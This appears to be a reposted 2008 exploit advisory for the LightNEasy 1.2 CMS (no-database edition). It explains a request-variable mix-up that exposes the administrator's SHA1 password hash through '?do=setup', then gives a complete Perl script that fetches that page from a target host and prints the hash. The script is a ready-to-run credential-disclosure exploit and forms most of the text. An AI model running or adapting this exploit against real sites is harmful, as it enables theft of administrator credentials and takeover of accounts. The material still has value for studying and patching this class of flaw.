LightNEasy 1.2 (no database) Remote Hash Retrieve Exploit
来源 作者:GiReX 发布时间:2008-04-11
# Author: __GiReX__ # mySite: # Date: 10/04/08
# CMS: LightNEasy 1.2 no database # Site:
# Bug: Hash Disclosure # Exploit: Remote Hash Retrieve
# Bug Explanation: LightNEasy/lightneasy.php
if($_GET['do']!="login" && $_GET['do']!="sitemap" && $_SESSION[$set['password']] != "1") unset($_GET['do']); if($_POST['submit']!=$langmessage[120] && $_POST['submit']!=$langmessage[33] && $_SESSION[$set['password']] != "1") unset($_POST['submit']);
# $_GET['do'] is unset if we aren't admin or isn't login or sitemap
function content() { ... switch($_REQUEST['do']) { ... case "setup": { ... <input type=\"hidden\" name=\"oldpassword\" value=\"".$set['password']."\" />
# content() diplays the HTML of the section passed with $_REQUEST['do'] # unset $_GET['do'] is not important if you switch the $_REQUEST one # you can only see the admin's hash in hidden input and not edit it becouse $_POST['submit'] is unset
#!/usr/bin/perl -w use strict; use LWP::UserAgent;
if(not defined $ARGV[0]) { banner(); print "[-] Usage: perl $0 [host] [path]\n"; print "[-] Example: perl $0 localhost /lightneasy/\n\n"; exit; } my $client = new LWP::UserAgent or exit;
my $target = $ARGV[0] =~ /^http:\/\// ? $ARGV[0]: 'http://' . $ARGV[0]; $target .= $ARGV[1] unless not defined $ARGV[1];
banner(); my $response = $client->get($target . 'LightNEasy.php?do=setup');
if($response->is_success) { if($response->as_string =~ /([a-f0-9]{40})/) { print "[+] Admin's SHA1 Hash: $1 \n"; print "[+] Exploit Successfull\n"; } else { print "[-] Unable to retrieve admin's hash\n"; print "[-] Exploit Failed\n"; } } else { print "[-] Unable to request ${target}LightNEasy.php?do=setup\n"; print "[-] Exploit Failed\n"; }
sub banner { print "[+] LightNEasy 1.2 no database Password Retrieve Exploit\n"; print "[+] Coded by __GiReX__\n"; print "\n"; }
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